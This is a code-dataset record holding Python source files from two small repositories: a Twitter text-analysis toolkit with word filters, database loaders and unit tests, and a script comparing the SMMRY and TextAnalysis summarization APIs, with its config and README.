96937ef7b042818773cdb490647aaa96971ee6ea
4b1d113a8b3843ccce9711102bfb013ac19b41d6
d1c912af79825ad0521a55ec9a033824043699af
refs/heads/master
2021-01-16T20:46:19.726823
2015-02-23T04:03:33
2015-02-23T04:03:33
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5670995712280273, "alphanum_fraction": 0.573720395565033, "avg_line_length": 39.49484634399414, "blob_id": "edd6e52ae5e6bb490bb8a7f9401504c1be78b131", "content_id": "7bd35a1bc7ec3307b6bf548e0dc5bdb760b7ff75", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3927, "license_type": "permissive", "max_line_length": 166, "num_lines": 97, "path": "/tests/test_TextTools.py", "repo_name": "williehammonds/TwitterDataAnalysis", "src_encoding": "UTF-8", "text": "import unittest\n\nimport nltk\n\nfrom TextAnalysis.TextTools import *\n\nclass TweetTextWordBagMakerTest(unittest.TestCase):\n def setUp(self):\n self.object = TweetTextWordBagMaker()\n\n def tearDown(self):\n self.object = ''\n\n def test_add_to_ignorelist(self):\n \"\"\"\n The tested function combines the lists, removes duplicates, and converts to a tuple\n \"\"\"\n #testlist1 = ['cat', 'fish']\n #testlist2 = ['cat', 'taco', 'burrito']\n #expect = ('cat', 'fish', 'taco', 'burrito')\n\n testlist1 = [1, 2]\n testlist2 = [2, 3, 4, 5]\n expect = (1, 2, 3, 4, 5)\n \n self.object.add_to_ignorelist(testlist1)\n #make sure adds to the list\n #t1 = list(self.object.ignore).sort()\n #self.assertListEqual(t1, testlist1.sort())\n self.object.add_to_ignorelist(testlist2)\n #make sure edited out the duplicates\n self.assertTupleEqual(self.object.ignore, expect)\n \n def test__make_wordbag(self):\n test = \"The quick brown fox became a delicious taco for the hungry cat. All lived happily ever after\"\n expect = [\"the\", \"quick\", \"brown\", \"fox\", \"became\", \"a\", \"delicious\", \"taco\", \"for\", \"the\", \"hungry\", \"cat\", \".\", \"all\", \"lived\", \"happily\", \"ever\", \"after\"]\n result = self.object._make_wordbag(test)\n self.assertListEqual(result, expect)\n \n def test__filter_ignored_terms(self):\n to_remove = ['dog', 'cow']\n test = ['cat', 'dog', 'fish', 'cow']\n expect = ['cat', 'fish']\n self.object.add_to_ignorelist(to_remove)\n result = self.object._filter_ignored_terms(test)\n self.assertListEqual(result, expect)\n \n def test__filter_usernames(self):\n test = ['taco', '@burrito', 'cat', '@dog']\n expect = ['taco', 'cat']\n result = self.object._filter_usernames(test)\n self.assertListEqual(result, expect)\n \n def test__filter_urls(self):\n test = ['taco', '//t.co', 'cat', '//t.co']\n expect = ['taco', 'cat']\n result = self.object._filter_urls(test)\n self.assertListEqual(result, expect)\n \n \n def test_process(self):\n test = [{'tweetID' : 1, 'tweetText' : \"The first tweet. It has text\"},\n {'tweetID' : 2, 'tweetText' : \"The quick brown fox became a delicious taco for the hungry cat. 
All lived happily ever after\"}]\n expect = [\"first\", \"tweet\", \"text\", \"quick\", \"brown\", \"fox\", \"became\", \"delicious\", \"taco\", \"hungry\", \"cat\",\n \"lived\", \"happily\", \"ever\"]\n self.object.add_to_ignorelist([\".\", \",\"])\n self.object.add_to_ignorelist(nltk.corpus.stopwords.words('english'))\n self.object.process(test)\n self.assertEqual(self.object.masterbag, expect)\n self.assertTupleEqual(self.object.tweet_tuples[0], (1, [\"first\", \"tweet\", \"text\"]))\n self.assertTupleEqual(self.object.tweet_tuples[1], (2, [\"quick\", \"brown\", \"fox\", \"became\", \"delicious\", \"taco\", \"hungry\", \"cat\", \"lived\", \"happily\", \"ever\"]))\n\n\nclass WordFiltersTest(unittest.TestCase):\n def setUp(self):\n self.object = WordFilters()\n\n def tearDown(self):\n self.object = ''\n \n def test_remove_fragments(self):\n test = ['cat', 'dog', \"amp\", '...', '//t.co', \"'re'\", \"'m\", 'fish', \"'s\", 'cow']\n expect = ['cat', 'dog', 'fish', 'cow']\n result = self.object.remove_fragments(test)\n self.assertListEqual(result, expect)\n \n def test_remove_punctuation(self):\n test = ['cat', 'dog', \"&\", '.', '/', \"'\", \"!\", 'fish', \"#\", 'cow']\n expect = ['cat', 'dog', 'fish', 'cow']\n result = self.object.remove_punctuation(test)\n self.assertListEqual(result, expect)\n \n def test_filter_stopwords(self):\n test = ['taco', 'a', 'cat', 'the']\n expect = ['taco', 'cat']\n result = self.object.filter_stopwords(test)\n self.assertListEqual(result, expect)" }, { "alpha_fraction": 0.5550661087036133, "alphanum_fraction": 0.5560826659202576, "avg_line_length": 35.432098388671875, "blob_id": "bbbbf318141134fa46777556ed8db9836196113e", "content_id": "e55fc568120522af1f433b51dd13da3d5b29001f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2951, "license_type": "permissive", "max_line_length": 124, "num_lines": 81, "path": "/ConstantsAndUtilities.py", "repo_name": "williehammonds/TwitterDataAnalysis", "src_encoding": "UTF-8", "text": "import string\n\n\nclass Ignore(object):\n \"\"\"\n This contains all the terms to be ignored from hashtags etc. 
It is inherited by other classes which do cleaning\n    \n    Attributes:\n        words: Dictionary with categories of irrelevant terms as keys (placenames, smallwords, socialmediaterms, irrelevant)\n        fragments: String fragments which should be filtered out\n    \"\"\"\n    fragments = [\"'s\", \"amp\", '...', '//t.co', \"'re'\", \"'m\"]\n    punctuation = string.punctuation\n    words = {\n        'placenames' : ['tn', 'nashville', 'memphis', 'tennessee', 'knoxville', 'fl', 'tx', 'sc', 'nc', 'co', \n                        'nyc', 'va', 'ga', 'twittoma', 'team243'],\n        'smallwords' : ['no', 'be', 'my', 'the', 'like', 'in', 'i', 'a', 'you', 'is', 'of', 'and', 'it', 'to',\n                        'this', 'so', 'for', 'on', 'up'], \n        'socialmediaterms' : ['hashtag', 'selfie', 'repost', 'nofilter', 'instagram', 'instamood', 'instalike',\n                              'instadaily', 'picoftheday', 'photo', 'instapic', 'http', 'rt', 'mt'],\n        'irrelevant' : ['recordstoreday', 'vinyl', 'naruto', 'bread' ]\n    }\n\n    def __init__(self):\n        self.words = Ignore.words\n        wordlist = []\n        [wordlist.append(word) for k in Ignore.words.keys() for word in Ignore.words[k]]\n        self.wordtuple = tuple(wordlist)\n\n\n    @staticmethod\n    def iterable():\n        \"\"\"\n        Returns a list of all the contents of the ignore word categories\n        \"\"\"\n        wordlist = []\n        [wordlist.append(word) for k in Ignore.words.keys() for word in Ignore.words[k]]\n        return wordlist\n\n    def generator(self):\n        \"\"\"\n        Generator which yields the ignore words one at a time\n        \"\"\"\n        for word in self.wordtuple:\n            yield word\n\n\n    @staticmethod\n    def get_list():\n        \"\"\"\n        Returns a list of everything to ignore\n        \"\"\"\n        wordlist = [w for wl in Ignore.words.values() for w in wl]\n        wordlist += Ignore.fragments\n        wordlist += list(Ignore.punctuation)\n        return wordlist\n    \n    \nclass Merge(object):\n    \"\"\"\n    This holds terms which are to be merged together in analyzing graphs\n    \n    Attributes:\n        toMerge: Dictionary with the master term as key and values to be merged in list as values\n    \"\"\"\n    toMerge = {\n        'Fibromyalgia' : ['fibro', 'fibromyalgia', 'fms', 'fm'],\n        'CRPS' : ['crps', 'rsd'], \n        'ChronicFatigue' : ['chronicfatigue', 'chronicfatiguesyndrome', 'cfs', 'mecfs', 'cfsme', 'cfids', \n                            'myalgicencephalomyelitis', 'mcs' ], \n        'RheumatoidArthritis' : ['rheumatoid', 'ra', 'rheumatoidarthritis'],\n        'Endometriosis' : ['endometriosis', 'endo']\n    }\n\nif __name__ == '__main__':\n    pass\n" }, { "alpha_fraction": 0.6059828996658325, "alphanum_fraction": 0.6059828996658325, "avg_line_length": 21.960784912109375, "blob_id": "4c0d30c4de846db05e1a82622a2a8f2c0ed8e8f9", "content_id": "23f888d2b90fdab8f632ade7a0049d1d33ef5f08", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1170, "license_type": "permissive", "max_line_length": 64, "num_lines": 51, "path": "/TweetDAOs.py", "repo_name": "williehammonds/TwitterDataAnalysis", "src_encoding": "UTF-8", "text": "\"\"\"\nThis contains classes for loading tweet data\n\nTHIS SHOULD INSTEAD USE THE DAO IN TwitterMining\n\"\"\"\n\nimport DAO\n\n\nclass TwitterSQLDAO(DAO.BaseDAO):\n    \"\"\"\n    Base database abstraction layer for twitter mysql database\n    \"\"\"\n\n    def __init__(self, test=False, local=True):\n        if test is False:\n            databaseName = 'twitter_data'\n        else:\n            databaseName = 'twitter_dataTEST'\n        DAO.BaseDAO.__init__(self)\n        if local is False:\n            self.connectRemote(databaseName)\n        else:\n            
self.connect(databaseName)\n\n\nclass TweetTextGetter(TwitterSQLDAO):\n \"\"\"\n Loads all tweetids and tweettext\n \n Args:\n test: Whether to use the test db\n local: Whether to use the local or remote db\n \n Returns:\n List of dictionaries with keys tweetID and tweetText\n \"\"\"\n\n def __init__(self, test=False, local=True):\n TwitterSQLDAO.__init__(self, test=test, local=local)\n\n\n def load_tweets(self):\n self.query = \"\"\"SELECT tweetID, tweetText FROM tweets\"\"\"\n self.val = []\n self.returnAll()\n return list(self.results)\n\n\nif __name__ == '__main__':\n pass" }, { "alpha_fraction": 0.5942720770835876, "alphanum_fraction": 0.5990453362464905, "avg_line_length": 19.950000762939453, "blob_id": "9f9d9ef35a699a1cb0528048f40a1f140679182d", "content_id": "b32f53076f5fcb97747c2662cb71e2bd92225ef5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 419, "license_type": "permissive", "max_line_length": 42, "num_lines": 20, "path": "/tests/test_ConstantsAndUtilities.py", "repo_name": "williehammonds/TwitterDataAnalysis", "src_encoding": "UTF-8", "text": "__author__ = 'adam'\n\nimport unittest\nfrom ConstantsAndUtilities import *\n\n\nclass IgnoreTest(unittest.TestCase):\n def setUp(self):\n self.object = Ignore()\n\n def test_generator(self):\n pass\n # # expect = Ignore.words[0][0]\n # expect = 'recordstoreday'\n # result = self.object.generator()\n # self.assertEqual(expect, result)\n\n\nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.5718811750411987, "alphanum_fraction": 0.5817821621894836, "avg_line_length": 32.66222381591797, "blob_id": "217351c5334bd3ef1085aceaee6e5c6e5ecf958f", "content_id": "b0808a07e207b9c63847aa59439c1edef224d81e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7575, "license_type": "permissive", "max_line_length": 127, "num_lines": 225, "path": "/TextAnalysis/TextTools.py", "repo_name": "williehammonds/TwitterDataAnalysis", "src_encoding": "UTF-8", "text": "\nimport nltk\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nimport time\n\n#Used for WordFilters\nfrom ConstantsAndUtilities import Ignore\nimport string\n\nfrom OptimizationTools import *\n\nclass ProcessingError(Exception):\n def __init__(self, identifier):\n self.identifier = identifier\n def __repr__(self):\n return \"%s went bad on %s : %s\" % (self.kind, self.identifier_type, self.identifier)\n\nclass TweetProcessingError(ProcessingError):\n def __init__(self, tweetID):\n self.kind = 'TweetProcessing'\n self.identifier_type = 'tweetID'\n ProcessingError.__init__(self, tweetID)\n\nclass StringProcessingError(ProcessingError):\n def __init__(self, string_processed):\n self.kind = 'StringProcessing'\n self.identifier_type = 'String content'\n ProcessingError.__init__(self, string_processed)\n\n\nclass TweetTextWordBagMaker(object):\n \"\"\"\n This takes a list of dictionaries containing tweetID and tweetText and processes the texts for bag of words type analyses.\n \n Before running the process command, all lists of strings to ignore should be loaded using add_to_ignorelist()\n \n \n Attributes:\n masterbag: List containing all words\n ignore: Tuple of strings to ignore through filtering\n tweet_tuples: List containing tuples with the structure (tweetID, [list of words in tweet])\n \"\"\"\n def __init__(self):\n self.ignore = ()\n self.masterbag = [] #This will hold all words\n self.tweet_tuples = []\n \n def add_to_ignorelist(self, 
list_to_ignore):\n \"\"\"\n Add a list of strings to the internally held tuple of strings to ignore in processing text\n \n Args:\n list_to_ignore: List of strings to ignore.\n \"\"\"\n self.ignore = list(self.ignore)\n [self.ignore.append(i) for i in list_to_ignore]\n self.ignore = set(self.ignore)\n self.ignore = tuple(self.ignore)\n \n def process(self, list_of_dicts):\n \"\"\"\n Processes the tweet texts\n Most recent execution time 599.286342144 sec for 732683 tweets\n Moved stopwords filtration first: 891.928412914 for 732683 tweets\n Merged stopwords into ignore list: 234.204810858 \n 1 loops, best of 3: 14min 56s per loop\n TODO: Change order of execution for optimization\n \n Args:\n list_of_dicts: List of dictionaries with keys tweetID and tweetText\n \"\"\"\n for t in list_of_dicts:\n tweetid = t['tweetID']\n #process text\n words = self._make_wordbag(t['tweetText'])\n #words = self._filter_stopwords(words)\n words = self._filter_ignored_terms(words)\n words = self._filter_usernames(words)\n words = self._filter_urls(words)\n #process tuple\n tweet_tuple = (tweetid, words)\n self.tweet_tuples.append(tweet_tuple)\n self.masterbag += words\n \n def new_process(self, list_of_dicts):\n \"\"\"\n Best time 225.85651803\n \"\"\"\n for t in list_of_dicts:\n tweetid = t['tweetID']\n #process text\n words = self._make_wordbag(t['tweetText'])\n words = [w for w in words if self._check_unwanted(w) and w not in self.ignore ]\n #process tuple\n tweet_tuple = (tweetid, words)\n self.tweet_tuples.append(tweet_tuple)\n self.masterbag += words\n \n def OLDprocess(self, list_of_dicts): \n for t in list(self.results):\n tweetid = t['tweetID']\n #process text\n words = [word for sent in sent_tokenize(t['tweetText']) for word in word_tokenize(sent)]\n words = [w.lower() for w in words]\n words = [w for w in words if w not in Ignore.punctuation]#remove punctuation\n words = [w for w in words if w not in Ignore.fragments]#remove fragments\n words = [w for w in words if w[0] != '@']#Get rid of usernames\n words = [w for w in words if w[0:6] != '//t.co'] #Remove some urls\n words = [w for w in words if w not in Ignore.words['socialmediaterms']] #Remove terms from social media\n words = [w for w in words if w not in nltk.corpus.stopwords.words('english')] #Remove stopwords\n #process tuple\n tweet_tuple = (tweetid, words)\n self.tweet_tuples.append(tweet_tuple)\n self.masterbag += words\n \n def _make_wordbag(self, text):\n \"\"\"\n Takes a bunch of sentences and extracts all the words, makes them lowercase, and returns them in a list\n \n Args:\n text: String text to be word tokenized\n \n Returns:\n List of words, all lower case\n \"\"\"\n bag = [word.lower() for sent in sent_tokenize(text) for word in word_tokenize(sent)]\n return bag\n\n def _filter_ignored_terms(self, wordlist):\n \"\"\"\n Remove items that are in the ignore list\n \n Args:\n wordlist: List of strings to be filtered\n \n Returns:\n Filtered list\n \"\"\"\n if len(self.ignore) == 0:\n pass\n # TODO Raise error message\n #raise\n words = [w for w in wordlist if w not in self.ignore]\n return words\n \n def _check_unwanted(self, word):\n if word[0] != '@' and word[0:6] != '//t.co':\n return True\n else:\n return False\n \n def _filter_usernames(self, wordlist):\n \"\"\"\n Gets rid of usernames by recognizing the @\n TODO: Modify to recognize cases of .@username\n \n \"\"\"\n words = [w for w in wordlist if w[0] != '@']\n return words\n \n def _filter_urls(self, wordlist):\n \"\"\"\n Removes some urls\n TODO: Make this better\n \n 
Args:\n wordlist: List of strings to be filtered\n \n Returns:\n Filtered list\n \"\"\"\n words = [w for w in wordlist if w[0:6] != '//t.co']\n return words\n \n\n\nclass WordFilters(object):\n \"\"\"\n This has filters for removing various strings and string components.\n \n \"\"\"\n \n @staticmethod\n def remove_fragments(wordlist):\n \"\"\"\n Filters string fragments from the list and returns the filtered list\n \n Args:\n wordlist: A list of words to have fragments removed from\n \n Returns:\n The filtered list\n \"\"\"\n wordlist = [w for w in wordlist if w not in Ignore.fragments]#remove fragments\n return wordlist\n\n @staticmethod \n def remove_punctuation(wordlist):\n \"\"\"\n Filters out punctuation from input list. Does not filter at the word level (e.g., will not remove the period in \"cat.\")\n \n Args:\n wordlist: A list of strings to be filtered for list items which are punctuation marks. \n \n Returns:\n The filtered list\n \"\"\"\n wordlist = [w for w in wordlist if w not in string.punctuation]#remove punctuation\n return wordlist\n \n @staticmethod\n def filter_stopwords(wordlist):\n \"\"\"\n Uses NLTK English stopwords corpus to remove stopwords.\n \n Args:\n wordlist: List of strings to be filtered\n \n Returns:\n Filtered list\n \"\"\"\n words = [w for w in wordlist if w not in nltk.corpus.stopwords.words('english')]\n return words\n\nif __name__ == '__main__':\n pass\n" } ]
5
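The TweetTextWordBagMaker in TextTools.py above requires every ignore list to be registered via add_to_ignorelist() before process() runs, and it consumes the tweetID/tweetText dictionaries that TweetTextGetter.load_tweets() returns. A minimal end-to-end sketch, assuming the repository modules are importable, the NLTK stopwords corpus is downloaded, and a reachable database is configured in DAO.BaseDAO:

```python
# Minimal driver for the word-bag pipeline described above.
import string

import nltk

from TweetDAOs import TweetTextGetter
from TextAnalysis.TextTools import TweetTextWordBagMaker

# Load [{'tweetID': ..., 'tweetText': ...}, ...] from the (test) database.
tweets = TweetTextGetter(test=True, local=True).load_tweets()

maker = TweetTextWordBagMaker()
# Everything to ignore must be registered before processing.
maker.add_to_ignorelist(list(string.punctuation))
maker.add_to_ignorelist(nltk.corpus.stopwords.words('english'))

maker.process(tweets)
print(len(maker.masterbag), "words from", len(maker.tweet_tuples), "tweets")
```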
bryand1/textsummarization
https://github.com/bryand1/textsummarization
2c6057d89fc5e21deeff8fe63b90deaaa71e49fb
db22bebb5ee20eb9f35da19eb1baabf2e35a53b0
6a9e84af14cc2485830ad8cb80ee455c2eb253b0
refs/heads/master
2022-12-16T05:58:37.469921
2018-05-03T18:26:56
2018-05-03T18:26:56
132,033,886
1
1
null
2018-05-03T18:21:09
2019-08-09T11:43:54
2022-12-08T00:01:14
Python
[ { "alpha_fraction": 0.7527114748954773, "alphanum_fraction": 0.7527114748954773, "avg_line_length": 26.117647171020508, "blob_id": "2f03d7dbab6fa0a25239bd674fb363c646927fc3", "content_id": "c88bf7b4644d3173c456f817be2fcacb84028ed1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 461, "license_type": "no_license", "max_line_length": 72, "num_lines": 17, "path": "/util.py", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "import config\nimport logging\nimport sys\nimport time\n\n\ndef get_logger(name):\n logger = logging.getLogger(name)\n logger.setLevel(config.LOGLEVEL)\n formatter = logging.Formatter(config.LOGFMT, datefmt=config.DATEFMT)\n formatter.converter = time.gmtime\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(config.LOGLEVEL)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.propagate = False\n return logger\n" }, { "alpha_fraction": 0.5921908617019653, "alphanum_fraction": 0.5965293049812317, "avg_line_length": 28.74193572998047, "blob_id": "63e208c7c4d23cfc9f127e7e300f6b8e0f4bf932", "content_id": "7994945ed738fd77cce4e22ebd621563608a5809", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1844, "license_type": "no_license", "max_line_length": 89, "num_lines": 62, "path": "/main.py", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSee and compare the output of popular extractive summarization APIs.\n@author Bryan Andrade <[email protected]>\n@version v0.0.1\n\nAPIs tested\n1. TextAnalysis Text Summarization\n2. SMMRY\n\nUsage: python3 main.py [--api textsummarization | smmry]\n\nArgs:\n--api Choose which API to test. 
Default is to run all APIs\n\"\"\"\nimport api\nimport argparse\nimport config\nimport os\nimport util\n\nlogger = util.get_logger(\"main\")\n\nif __name__ == '__main__':\n p = argparse.ArgumentParser()\n p.add_argument('--api', type=str)\n cmdargs = p.parse_args()\n # If cmdargs.api is None, user intends to run all summary APIs\n article = 'uber-vs-lyft.txt'\n with open(os.path.join(config.WD, 'article', article)) as fh:\n text = fh.read()\n logger.info(\"Loaded article %s\", article)\n # TextAnalysis Text Summarization API\n if cmdargs.api == 'textsummarization' or cmdargs.api is None:\n args = (\n config.TEXTSUMMARIZATION_URL,\n config.X_MASHAPE_KEY,\n config.SENTNUM,\n text\n )\n resp = api.textsummarization.summarize(*args)\n js = resp.json()\n output = []\n for i, sentence in enumerate(js['sentences']):\n output.append(f\"{i + 1}: {sentence}\")\n with open(os.path.join(config.WD, 'output', 'textsummarization.txt'), 'w') as fh:\n fh.write('\\n'.join(output))\n logger.info(\"textsummarization done\")\n\n # SMMRY\n if cmdargs.api == 'smmry' or cmdargs.api is None:\n args = (\n config.SMMRY_URL,\n config.SMMRY_KEY,\n config.SENTNUM,\n text\n )\n resp = api.smmry.summarize(*args)\n js = resp.json()\n with open(os.path.join(config.WD, 'output', 'smmry.txt'), 'w') as fh:\n fh.write(js['sm_api_content'])\n logger.info(\"smmry done\")\n" }, { "alpha_fraction": 0.6462196707725525, "alphanum_fraction": 0.6462196707725525, "avg_line_length": 27.040000915527344, "blob_id": "21bbeeaf49e5e1828111000a3c73b875fcdf95bd", "content_id": "10bfe75d4c907898c4efb43812bc0894e748f55a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 701, "license_type": "no_license", "max_line_length": 71, "num_lines": 25, "path": "/api/textsummarization.py", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "import requests\n\n\ndef summarize(api_endpoint, api_key, num_sentences, text_to_summarize):\n \"\"\"\n TextAnalysis Text Summarization API - provided by Mashape\n :param api_endpoint: string url\n :param api_key: string credential\n :param text_to_summarize: plain text article\n :param num_sentences: int of size of the summary\n :return: requests.Response\n \"\"\"\n headers = {\n 'X-Mashape-Key': api_key,\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Accept': 'application/json'\n }\n\n data = {\n 'sentnum': num_sentences,\n 'text': text_to_summarize\n }\n\n resp = requests.post(api_endpoint, headers=headers, data=data)\n return resp\n" }, { "alpha_fraction": 0.7066380977630615, "alphanum_fraction": 0.7109207510948181, "avg_line_length": 28.1875, "blob_id": "d6f9b14a36890b5182b8841404cb4273c4936256", "content_id": "22bd4ad91538367cfa31e8aa2b17f2782ee496ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 467, "license_type": "no_license", "max_line_length": 100, "num_lines": 16, "path": "/config.py", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "import os\nimport logging\n\nWD = os.path.dirname(os.path.abspath(__file__))\n\nLOGLEVEL = logging.INFO\nLOGFMT = \"%(asctime)s %(name)s %(levelname)s %(message)s\"\nDATEFMT = \"%Y-%m-%d %H:%M:%S\"\n\nX_MASHAPE_KEY = os.environ.get('X_MASHAPE_KEY')\n\nTEXTSUMMARIZATION_URL = 'https://textanalysis-text-summarization.p.mashape.com/text-summarizer-text'\nSMMRY_URL = 'https://api.smmry.com'\nSMMRY_KEY = os.environ.get('SMMRY_KEY')\n# Number of sentences in summary output\nSENTNUM = 10\n" }, { 
"alpha_fraction": 0.6612021923065186, "alphanum_fraction": 0.6612021923065186, "avg_line_length": 31.294116973876953, "blob_id": "b37f6234a1c784165e26c13079ceb9a7c47e71ee", "content_id": "2859d991cd3b5bb4f046fbfd9451be5826d7d2ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 549, "license_type": "no_license", "max_line_length": 71, "num_lines": 17, "path": "/api/smmry.py", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "import requests\n\n\ndef summarize(api_endpoint, api_key, num_sentences, text_to_summarize):\n \"\"\"\n SMMRY - text summarization API\n :param api_endpoint: string url\n :param api_key: string credential\n :param text_to_summarize: plain text article\n :param num_sentences: int of size of the summary\n :return: requests.Response\n \"\"\"\n url = \"{}/?SM_API_KEY={}&SM_LENGTH={}\".format(\n api_endpoint, api_key, num_sentences)\n data = {'sm_api_input': text_to_summarize}\n resp = requests.post(url, data=data)\n return resp\n" }, { "alpha_fraction": 0.7235862016677856, "alphanum_fraction": 0.7263448238372803, "avg_line_length": 36.76041793823242, "blob_id": "bf1bd1456246e73bc1f1590aca15cb3db477ca69", "content_id": "c062db06db1de2ac6546f9aee41d1e903a1dfd4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3625, "license_type": "no_license", "max_line_length": 570, "num_lines": 96, "path": "/README.md", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "# Text Summarization Comparison\n\n### Objective\n\nSee and compare the output of popular extractive summarization APIs.\n\n### Getting started\n\n```bash\ngit clone https://github.com/bryand1/textsummarization.git\ncd textsummarization\npip3 install -r requirements.txt\ntouch apikeys.env\n# Edit apikeys.env with your API keys\n# export X_MASHAPE_KEY=[YOUR KEY]\n# export SMMRY_KEY=[YOUR KEY]\nbash run.sh\n```\n\n### APIs Tested\n\n+ [TextAnalysis Text Summarization](https://market.mashape.com/textanalysis/text-summarization)\n+ [SMMRY](https://smmry.com/)\n\n#### Text Summarization\n\n```python\n# request format\n# These code snippets use an open-source library. http://unirest.io/python\nresponse = unirest.post(\"https://textanalysis-text-summarization.p.mashape.com/text-summarizer-text\",\n headers={\n \"X-Mashape-Key\": \"[ENTER KEY HERE]\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\"\n },\n params={\n \"sentnum\": 5,\n \"text\": \"Automatic summarization is the process of reducing a text document with a computer program in order to create a summary that retains the most important points of the original document. As the problem of information overload has grown, and as the quantity of data has increased, so has interest in automatic summarization. Technologies that can make a coherent summary take into account variables such as length, writing style and syntax. An example of the use of summarization technology is search engines such as Google. Document summarization is another.\"\n }\n)\n```\n\nText Summarization returns a JSON response.\n\n```javascript\n{\n \"sentences\": [\n \"Text of sentence #1...\",\n \"Text of sentence #2...\",\n // etc.\n ]\n}\n```\n\n#### SMMRY\n\nExcerpts from [SMMRY API documentation](https://smmry.com/api)\n\nThe API request must be made to https://api.smmry.com. 
The returned response will be encoded in JSON.\n\nHere are the possible parameters placed in the request URL.\n \n+ SM\\_API\\_KEY=N Required, your API key.\n+ SM\\_URL=X Optional, the webpage to summarize.\n+ SM\\_LENGTH=N Optional, the number of sentences returned, default 7.\n+ SM\\_KEYWORD_COUNT=N Optional, N the number of keywords to return.\n+ SM\\_WITH\\_BREAK Optional, inserts the string [BREAK] between sentences.\n+ SM\\_WITH\\_ENCODE Optional, converts HTML entities to their applicable chars.\n+ SM\\_IGNORE\\_LENGTH Optional, returns summary regardless of quality or length.\n+ SM\\_QUOTE\\_AVOID Optional, sentences with quotations will be excluded.\n+ SM\\_QUESTION\\_AVOID Optional, sentences with question will be excluded.\n+ SM\\_EXCLAMATION\\_AVOID Optional, sentences with exclamation marks will be excluded.\n\nHere are the possible indexes of the array returned in a JSON array.\n \n+ sm\\_api\\_message Contains notices, warnings, and error messages.\n+ sm\\_api\\_character_count Contains the amount of characters returned.\n+ sm\\_api\\_title Contains the title when available.\n+ sm\\_api\\_content Contains the summary.\n+ sm\\_api\\_keyword\\_array Contains top ranked keywords in descending order.\n+ sm\\_api\\_error Contains error code.\n\n```php\n$text = \"Your long text goes here...\";\n\n$ch = curl_init(\"http://api.smmry.com/&SM_API_KEY=X\");\ncurl_setopt($ch, CURLOPT_HTTPHEADER, array(\"Expect:\")); // See Note\ncurl_setopt($ch, CURLOPT_POST, true); \ncurl_setopt($ch, CURLOPT_POSTFIELDS, \"sm_api_input=\".$text);\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\ncurl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);\ncurl_setopt($ch, CURLOPT_TIMEOUT, 20);\n$return = json_decode(curl_exec($ch), true);\ncurl_close($ch);\n```\n" }, { "alpha_fraction": 0.807692289352417, "alphanum_fraction": 0.807692289352417, "avg_line_length": 25, "blob_id": "b1a02d58dbfbb8dd7827a68cbb032453f77f2b6a", "content_id": "50ba5f571383f5956abdba89e9ecb97e4b419888", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "no_license", "max_line_length": 31, "num_lines": 2, "path": "/api/__init__.py", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "from . import smmry\nfrom . import textsummarization\n" }, { "alpha_fraction": 0.3921568691730499, "alphanum_fraction": 0.6764705777168274, "avg_line_length": 13.714285850524902, "blob_id": "0eeac963ac580cddadaf7c12c9dc8d4c6475f8cf", "content_id": "38b3f0049daf19d739d0b40d9e814d5cc6a4a6c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 102, "license_type": "no_license", "max_line_length": 18, "num_lines": 7, "path": "/requirements.txt", "repo_name": "bryand1/textsummarization", "src_encoding": "UTF-8", "text": "attrs==17.4.0\ncertifi==2017.4.17\nchardet==3.0.3\nidna==2.5\nrequests==2.17.3\nsix==1.11.0\nurllib3==1.21.1" } ]
8
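The SMMRY excerpt embedded in the README above documents the full request/response contract, so it can be exercised directly from Python. Below is a minimal sketch mirroring the repo's own `api/smmry.py`; it assumes the `requests` library and a `SMMRY_KEY` environment variable, and the helper name `smmry_summarize` is invented here for illustration:

```python
import os
import requests

def smmry_summarize(text, sentences=7):
    # SM_API_KEY and SM_LENGTH go in the query string, per the README excerpt.
    url = "https://api.smmry.com/?SM_API_KEY={}&SM_LENGTH={}".format(
        os.environ["SMMRY_KEY"], sentences)
    # The article body is posted as the documented sm_api_input field.
    resp = requests.post(url, data={"sm_api_input": text})
    js = resp.json()
    # sm_api_error / sm_api_message are only present when the request fails.
    if "sm_api_error" in js:
        raise RuntimeError(js.get("sm_api_message", "SMMRY request failed"))
    # sm_api_content carries the summary itself.
    return js["sm_api_content"]
```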
kiradegraw/testRemoteRepo
https://github.com/kiradegraw/testRemoteRepo
037c9f7e09ba2fceab4ff401b7142bbd44ff2f5a
5be45d9a6e2db3487a1e4dffa660dcccd21868f5
d7f1a90afdf2b85ab9566e21776a06088c8b27ba
refs/heads/master
2023-07-27T23:31:12.013112
2021-09-07T23:29:56
